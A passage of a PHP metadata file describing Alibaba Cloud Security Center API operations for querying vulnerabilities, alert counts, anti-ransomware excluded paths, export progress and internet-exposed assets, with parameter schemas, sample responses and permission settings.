'description' => ''], ], ], 'title' => 'Query emergency vulnerability information', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeEmgVulItem'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeEmgVulItem', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CurrentPage\\": 1,\\n \\"RequestId\\": \\"BC1868ED-A0E1-4D1C-BF7E-10DC0C34B3C3\\",\\n \\"PageSize\\": 10,\\n \\"TotalCount\\": 1,\\n \\"GroupedVulItems\\": [\\n {\\n \\"Status\\": 30,\\n \\"Type\\": \\"scan\\",\\n \\"CheckType\\": 1,\\n \\"GmtLastCheck\\": 1619286031000,\\n \\"Progress\\": 50,\\n \\"Description\\": \\"Chanjet T-Plus is an Internet business management software. There is an unauthorized access vulnerability in one of its interfaces disclosed on the Internet. Attackers can construct malicious requests to upload malicious files to execute arbitrary code and control the server.\\",\\n \\"GmtPublish\\": 1618887687000,\\n \\"PendingCount\\": 0,\\n \\"AliasName\\": \\"Changjietong T + SetupAccount/Upload.aspx file Upload vulnerability (CNVD-2022-60632)\\",\\n \\"Name\\": \\"scan:AVD-2021-179344\\",\\n \\"RaspDefend\\": 1\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeEventLevelCount' => [ 'summary' => 'Queries the statistics of alert events by risk level.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '157267', 'abilityTreeNodes' => ['FEATUREsas731ZAS'], ], 'parameters' => [ [ 'name' => 'From', 'in' => 'query', 'schema' => ['description' => 'The ID of the request source. Set the value to **sas**.'."\n", 'type' => 'string', 'required' => false, 'example' => 'sas', 'title' => ''], ], [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container cluster.'."\n" ."\n" .'> You can call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to query the IDs of container clusters.'."\n", 'type' => 'string', 'required' => false, 'example' => 'c7e3c5b420a7947c2933303144688****', 'title' => ''], ], [ 'name' => 'ContainerIds', 'in' => 'query', 'schema' => ['description' => 'The ID of the container.'."\n", 'type' => 'string', 'required' => false, 'example' => 'xxxxxx30389a10c28f6d38f2398f0dcexxxxxxx922b9e8290dc7c3019d4a8,48b87f2c0662e334820f436cb9133f1ae4e053d39b6fad42xxxxxxxxxx', 'title' => ''], ], [ 'name' => 'ContainerFieldName', 'in' => 'query', 'schema' => ['description' => 'The key of the condition that is used to query alert events on containers. Valid values:'."\n" ."\n" .'* **instanceId**: the ID of the asset'."\n" .'* **appName**: the name of the application'."\n" .'* **clusterId**: the ID of the cluster'."\n" .'* **regionId**: the ID of the region'."\n" .'* **nodeName**: the name of the node'."\n" .'* **namespace**: the namespace'."\n" .'* **clusterName**: the name of the cluster'."\n" .'* **image**: the name of the image'."\n" .'* **imageRepoName**: the name of the image repository'."\n" .'* **imageRepoNamespace**: the namespace to which the image repository belongs'."\n" .'* **imageRepoTag**: the tag that is added to the image'."\n" .'* **imageDigest**: the digest of the image'."\n", 'type' => 'string', 'required' => false, 'example' => 'clusterId', 'title' => ''], ], [ 'name' => 'ContainerFieldValue', 'in' => 'query', 'schema' => ['description' => 'The value of the condition that is used to query alert events on containers. If you specify multiple values, separate them with commas (,).'."\n", 'type' => 'string', 'required' => false, 'example' => 'c951761046a9c4afe92be0a7b5bexxxxx', 'title' => ''], ], [ 'name' => 'TargetType', 'in' => 'query', 'schema' => ['description' => 'The type of the query condition. Valid values:'."\n" ."\n" .'* **containerId**: the ID of the container'."\n" .'* **uuid**: the UUID of the asset'."\n", 'type' => 'string', 'required' => false, 'example' => 'uuid', 'title' => ''], ], [ 'name' => 'MultiAccountActionType', 'in' => 'query', 'schema' => ['description' => 'The type of the accounts that you want to query. Default value: **0**. Valid values:'."\n" ."\n" .'* **0**: the current account.'."\n" .'* **1**: all accounts.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'EventLevels' => [ 'description' => 'The statistics of alerts by risk level.'."\n", 'type' => 'object', 'properties' => [ 'Serious' => ['description' => 'The number of alerts whose Emergency level is Urgent.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Suspicious' => ['description' => 'The number of alerts whose Emergency level is Suspicious.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Remind' => ['description' => 'The number of alerts whose Emergency level is Reminder.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**: The request was successful.'."\n" .'* **false**: The request failed.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The status code returned. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The error message returned.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request.'."\n", 'type' => 'string', 'example' => 'CE8CA5EA-24EF-5D41-B735-53ACE7XXXXX', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"EventLevels\\": {\\n \\"Serious\\": 0,\\n \\"Suspicious\\": 1,\\n \\"Remind\\": 2\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"CE8CA5EA-24EF-5D41-B735-53ACE7XXXXX\\"\\n}","type":"json"}]', 'title' => 'DescribeEventLevelCount', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeEventLevelCount'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeEventLevelCount', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeEventOnStage' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92071', 'abilityTreeNodes' => ['FEATUREsasAFG0OH'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type of the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The unique identifier that Alibaba Cloud generated for the request.', 'type' => 'string', 'example' => '24A20733-10A0-4AF6-BE6B-E332241XXXXX', 'title' => ''], 'SecurityEventStageResponse' => [ 'description' => 'The platforms supported by threat detection.', 'type' => 'object', 'properties' => [ 'SecurityEventOnStag' => [ 'description' => 'The platforms supported by threat detection.'."\n" ."\n" .'- **container**: container'."\n" .'- **linux**: linux'."\n" .'- **windows**: windows.', 'enumValueTitles' => ['container' => 'container.', 'linux' => 'linux', 'windows' => 'windows'], 'type' => 'object', 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query platforms supported by threat detection', 'summary' => 'Queries the platforms supported by threat detection.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeEventOnStage'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeEventOnStage', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"24A20733-10A0-4AF6-BE6B-E332241XXXXX\\",\\n \\"SecurityEventStageResponse\\": {\\n \\"SecurityEventOnStag\\": {\\n \\"test\\": \\"test\\",\\n \\"test2\\": 1\\n }\\n }\\n}","type":"json"}]', ], 'DescribeExcludeSystemPath' => [ 'summary' => 'Queries the excluded directories of the anti-ransomware system.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92072', 'abilityTreeNodes' => ['FEATUREsasE5WAEJ'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries to return on each page when paging is used for a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'maximum' => '200', 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return. Default value: 1, which indicates that the first page is returned.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'FBBEB173-1F43-505F-A876-C03ECDF6****', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in the paged query when paging is used.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of system excluded folders returned per page in the paged query when paging is used.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of system excluded directories.', 'type' => 'integer', 'format' => 'int32', 'example' => '55', 'title' => ''], 'Count' => ['description' => 'The number of system excluded directories on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], 'ExcludePaths' => [ 'description' => 'The list of system excluded directories.', 'type' => 'array', 'items' => [ 'description' => 'The system excluded directory information.', 'type' => 'object', 'properties' => [ 'Path' => ['description' => 'The absolute path of the directory.', 'type' => 'string', 'example' => '/bin/', 'title' => ''], 'Os' => ['description' => 'The operating system of the server. Valid values:'."\n" .'- **linux**: Linux.'."\n" .'- **windows**: Windows.', 'type' => 'string', 'example' => 'linux', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query anti-ransomware system excluded directories', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeExcludeSystemPath'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeExcludeSystemPath', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"FBBEB173-1F43-505F-A876-C03ECDF6****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 55,\\n \\"Count\\": 20\\n },\\n \\"ExcludePaths\\": [\\n {\\n \\"Path\\": \\"/bin/\\",\\n \\"Os\\": \\"linux\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeExportInfo' => [ 'summary' => 'Queries the progress of an export task.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'ExportId', 'in' => 'query', 'schema' => ['description' => 'The ID of the export task.'."\n" .'> You can obtain this parameter by calling the [ExportRecord](~~ExportRecord~~) operation to initiate an export.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '111', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The ID of the member account in the resource directory.'."\n" .'> You can obtain this parameter by invoking the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '16670360956*****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'Link' => ['description' => 'The download URL of the exported Excel file.', 'type' => 'string', 'example' => 'http://www.aliyun.com', 'title' => ''], 'Progress' => ['description' => 'The export progress percentage (%).', 'type' => 'integer', 'format' => 'int32', 'example' => '16', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'CE500770-42D3-442E-9DDD-156E0F9F3B45', 'title' => ''], 'CurrentCount' => ['description' => 'The number of data entries that have been exported.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'Message' => ['description' => 'The message returned for the export result. Fixed value: **success**. This value indicates that the export is successful.', 'type' => 'string', 'example' => 'success', 'title' => ''], 'FileName' => ['description' => 'The name of the exported Excel file.', 'type' => 'string', 'example' => 'health_check_export_20171123', 'title' => ''], 'TotalCount' => ['description' => 'The total number of data entries in the exported Excel file.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'ExportStatus' => ['description' => 'The status of the export task.'."\n" ."\n" .'Valid values:'."\n" ."\n" .'- **init**: export initialization'."\n" .'- **exporting**: export in progress'."\n" .'- **success**: export successful.', 'type' => 'string', 'example' => 'success', 'title' => ''], 'Id' => ['description' => 'The ID of the export task.', 'type' => 'integer', 'format' => 'int64', 'example' => '131231', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ], ], 'title' => 'View export progress', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeExportInfo'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeExportInfo', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Link\\": \\"http://www.aliyun.com\\",\\n \\"Progress\\": 16,\\n \\"RequestId\\": \\"CE500770-42D3-442E-9DDD-156E0F9F3B45\\",\\n \\"CurrentCount\\": 20,\\n \\"Message\\": \\"success\\",\\n \\"FileName\\": \\"health_check_export_20171123\\",\\n \\"TotalCount\\": 100,\\n \\"ExportStatus\\": \\"success\\",\\n \\"Id\\": 131231\\n}","type":"json"}]', ], 'DescribeExposedCheckWarning' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'TypeName', 'in' => 'query', 'schema' => ['description' => 'The type to which the baseline belongs.'."\n" .'> The **TypeName** field returned by calling the [DescribeRiskType](~~DescribeRiskType~~) operation.', 'type' => 'string', 'required' => false, 'example' => 'weak_password', 'title' => ''], ], [ 'name' => 'Uuids', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server to query. Separate multiple UUIDs with commas (,).'."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain the UUID of a server.', 'type' => 'string', 'required' => false, 'example' => '6541631a-7d47-41fd-9fef-9518113f****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The baseline risk results of exposed assets.', 'type' => 'object', 'properties' => [ 'Count' => ['description' => 'The number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '6D9CDB47-6191-4415-BE63-7E8B12CD****', 'title' => ''], 'WarningList' => [ 'description' => 'The list of baseline risks for exposed assets.', 'type' => 'array', 'items' => [ 'description' => 'The baseline risk information of exposed assets.', 'type' => 'object', 'properties' => [ 'SubTypeAlias' => ['description' => 'The display name of the subcategory to which the baseline belongs.', 'type' => 'string', 'example' => 'Redis DB login weak password baseline', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server.', 'type' => 'string', 'example' => '1d35b031-ee4e-4e53-8b53-465ab712****', 'title' => ''], 'TypeAlias' => ['description' => 'The display name of the category to which the baseline belongs.', 'type' => 'string', 'example' => 'Weak password', 'title' => ''], 'RiskName' => ['description' => 'The name of the baseline.', 'type' => 'string', 'example' => 'Weak password-Redis DB login weak password baseline', 'title' => ''], 'RiskId' => ['description' => 'The ID of the baseline.'."\n" ."\n" .'> You can call the [DescribeCheckWarningSummary](~~116179~~) operation to obtain the baseline ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '107', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => '-101', 'errorMessage' => '%s %s', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query baseline weak password risks of exposed assets', 'summary' => 'Queries the weak password risks of a specified exposed server.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeExposedCheckWarning'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeExposedCheckWarning', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Count\\": 10,\\n \\"RequestId\\": \\"6D9CDB47-6191-4415-BE63-7E8B12CD****\\",\\n \\"WarningList\\": [\\n {\\n \\"SubTypeAlias\\": \\"Redis DB login weak password baseline\\",\\n \\"Uuid\\": \\"1d35b031-ee4e-4e53-8b53-465ab712****\\",\\n \\"TypeAlias\\": \\"Weak password\\",\\n \\"RiskName\\": \\"Weak password-Redis DB login weak password baseline\\",\\n \\"RiskId\\": 107\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeExposedInstanceCriteria' => [ 'summary' => 'Retrieves the supported query conditions for querying exposed assets.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92075', 'abilityTreeNodes' => ['FEATUREsasAIJXMJ'], ], 'parameters' => [ [ 'name' => 'Value', 'in' => 'query', 'schema' => ['description' => 'The value of the query condition. Fuzzy match is supported.'."\n" ."\n" .'> This parameter supports queries by asset name, asset ID, public IP address of the asset, private IP address of the asset, exposed component, exposed port, or exposed IP address.', 'type' => 'string', 'required' => false, 'example' => 'testInstanceName', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The ID of the member account in the resource directory.'."\n" .'>Call the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => '127608589417****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '6D9CDB47-6191-4415-BE63-7E8B12CD4FBE', 'title' => ''], 'CriteriaList' => [ 'description' => 'The supported query conditions for querying exposed assets.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the query condition. Valid values:'."\n" .'- **input**: requires manual input of the query content.'."\n" .'- **select**: requires selecting a value from the options list (the **Values** field).', 'type' => 'string', 'example' => 'select', 'title' => ''], 'Name' => ['description' => 'The name of the query condition.', 'type' => 'string', 'example' => 'instanceId', 'title' => ''], 'Values' => ['description' => 'The available option values when **Type** (the type of the query condition) is **select**.'."\n" .'> When **Type** (the type of the query condition) is **input**, this parameter returns an empty value.', 'type' => 'string', 'example' => 'i-bp19r0fdd39idxhf****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query conditions supported for querying exposed assets', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeExposedInstanceCriteria'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeExposedInstanceCriteria', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"6D9CDB47-6191-4415-BE63-7E8B12CD4FBE\\",\\n \\"CriteriaList\\": [\\n {\\n \\"Type\\": \\"select\\",\\n \\"Name\\": \\"instanceId\\",\\n \\"Values\\": \\"i-bp19r0fdd39idxhf****\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeExposedInstanceDetail' => [ 'summary' => 'Queries the details of a specified server that is exposed on the Internet.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92076', 'abilityTreeNodes' => ['FEATUREsasAIJXMJ'], 'autoTest' => true, 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server or the instance ID of the database that is exposed on the Internet.'."\n" ."\n" .'> You can call the [DescribeExposedInstanceList](~~DescribeExposedInstanceList~~) operation to query the UUIDs of servers or instance IDs of databases.'."\n", 'type' => 'string', 'required' => true, 'example' => 'fc82b966-4d70-4e01-bf4f-aa4076a5****', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The Alibaba Cloud account ID of the member in the resource directory.'."\n" ."\n" .'> You can call the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to query the account ID.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1232428423234****', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'C590482B-54A7-4273-8115-9DBE2DE46B26', 'title' => ''], 'ExposedChains' => [ 'description' => 'The list of exposure details of the server or database.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The exposure details about the server or database.'."\n", 'type' => 'object', 'properties' => [ 'ExposureIp' => ['description' => 'The IP address of the server or the public endpoint of the database.'."\n", 'type' => 'string', 'example' => '47.99.XX.XX', 'title' => ''], 'GroupNo' => ['description' => 'The server group to which the server belongs.'."\n", 'type' => 'string', 'example' => 'test-group****', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server.'."\n", 'type' => 'string', 'example' => '47.99.XX.XX', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID.'."\n", 'type' => 'string', 'example' => 'i-bp116qem8npvchqc****', 'title' => ''], 'ExposureType' => ['description' => 'The resource from which the server or database is exposed. Valid values:'."\n" ."\n" .'* **INTERNET_IP**: the public IP address of an Elastic Compute Service (ECS) instance.'."\n" .'* **SLB**: the public IP address of a Server Load Balancer (SLB) instance.'."\n" .'* **EIP**: an elastic IP address (EIP).'."\n" .'* **DNAT**: the Network Address Translation (NAT) gateway that connects to the Internet by using the Destination Network Address Translation (DNAT) feature'."\n" .'* **DB_CONNECTION**: the public endpoint of a database.'."\n", 'type' => 'string', 'example' => 'INTERNET_IP', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server.'."\n", 'type' => 'string', 'example' => '192.168.XX.XX', 'title' => ''], 'ExposureTypeId' => ['description' => 'The ID of the instance to which the resource belongs. The valid values of this parameter vary based on the value of the ExposureType parameter.'."\n" ."\n" .'* If the value of the ExposureType parameter is **INTERNET_IP**, this parameter is empty.'."\n" .'* If the value of the ExposureType parameter is **SLB**, the value of this parameter is the ID of the SLB instance.'."\n" .'* If the value of the ExposureType parameter is **EIP**, the value of this parameter is the ID of the EIP.'."\n" .'* If the value of the ExposureType parameter is **DNAT**, the value of this parameter is the ID of the NAT gateway.'."\n" .'* If the value of the ExposureType parameter is **DB_CONNECTION**, the value of this parameter is the ID of the database.'."\n", 'type' => 'string', 'example' => 'eip-bp1bkgowzam49rld3****', 'title' => ''], 'RegionId' => ['description' => 'The region ID.'."\n" ."\n" .'> For information about the mapping between region IDs and region names, see [Regions and zones](~~40654~~).'."\n", 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server or the instance ID of the database.'."\n", 'type' => 'string', 'example' => '4f9ce097-4a7d-48fe-baef-6960e5b6****', 'title' => ''], 'ExposurePort' => ['description' => 'The port that is exposed on the Internet.'."\n", 'type' => 'string', 'example' => '22', 'title' => ''], 'InstanceName' => ['description' => 'The instance name.'."\n", 'type' => 'string', 'example' => 'worker-k8s-for-cs-c929ee2a145214f89a8b248005be5****', 'title' => ''], 'ExposureComponent' => ['description' => 'The server component that is exposed on the Internet.'."\n", 'type' => 'string', 'example' => 'openssl,openssh', 